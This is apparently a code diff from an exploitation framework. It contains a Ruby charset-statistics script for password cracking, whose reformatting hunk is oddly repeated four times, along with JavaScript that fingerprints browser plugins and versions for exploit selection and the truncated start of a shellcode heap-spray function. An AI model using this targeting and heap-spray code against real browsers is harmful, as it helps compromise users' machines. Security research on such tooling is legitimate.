-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -0,0 +1,89 @@
+window.ie_addons_detect = { };
+
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+window.ie_addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+window.ie_addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}
@@ -0,0 +1,110 @@
+window.misc_addons_detect = { };
+
+
+/**
+ * Detects whether the browser supports Silverlight or not
+ **/
+window.misc_addons_detect.hasSilverlight = function () {
+	var found = false;
+
+	//
+	// When on IE, we can use AgControl.AgControl to actually detect the version too.
+	// But this ability is specific to IE, so we fall back to just true/false response
+	//
+	try {
+		var ax = new ActiveXObject('AgControl.AgControl');
+		found = true;
+	} catch(e) {}
+
+	//
+	// ActiveX didn't get anything, try looking in MIMEs
+	//
+	if (!found) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i < mimes.length; i++) {
+			if (/x\-silverlight/.test(mimes[i].type)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	//
+	// MIMEs didn't work either. Try navigator.
+	//
+	if (!found) {
+		var count = navigator.plugins.length;
+		for (var i=0; i < count; i++) {
+			var pluginName = navigator.plugins[i].name;
+			if (/Silverlight Plug\-In/.test(pluginName)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	return found;
+}
+
+/**
+ * Returns the Java version
+ **/
+window.misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
@@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
 		return d.style[propCamelCase] === css;
 	}

+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
 	//--
 	// Client
 	//--
@@ -203,32 +210,46 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if ('HTMLTimeElement' in window) {
-			ua_version = '22.0'
+		if (css_is_valid('image-orientation',
+		                 'imageOrientation',
+		                 '0deg')) {
+			ua_version = '26.0';
+		} else if (css_is_valid('background-attachment',
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
 		} else if ('createElement' in document &&
 		           document.createElement('main') &&
 		           document.createElement('main').constructor === window['HTMLElement']) {
-			ua_version = '21.0'
+			ua_version = '21.0';
 		} else if ('imul' in Math) {
-			ua_version = '20.0'
+			ua_version = '20.0';
 		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
-			ua_version = '19.0'
+			ua_version = '19.0';
 		} else if ('devicePixelRatio' in window) {
-			ua_version = '18.0'
+			ua_version = '18.0';
 		} else if ('createElement' in document &&
 		           document.createElement('iframe') &&
 		           'sandbox' in document.createElement('iframe')) {
-			ua_version = '17.0'
+			ua_version = '17.0';
 		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
-			ua_version = '16.0'
+			ua_version = '16.0';
 		} else if ('HTMLSourceElement' in window && 
 		           HTMLSourceElement.prototype &&
 		           'media' in HTMLSourceElement.prototype) {
-			ua_version = '15.0'
+			ua_version = '15.0';
 		} else if ('mozRequestPointerLock' in document.body) {
-			ua_version = '14.0'
+			ua_version = '14.0';
 		} else if ('Map' in window) {
-			ua_version = "13.0"
+			ua_version = "13.0";
 		} else if ('mozConnection' in navigator) {
 			ua_version = "12.0";
 		} else if ('mozVibrate' in navigator) {
@@ -850,6 +871,12 @@ window.os_detect.getVersion = function(){
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
 			case "1000":
 				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
 				ua_version = "10.0";
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
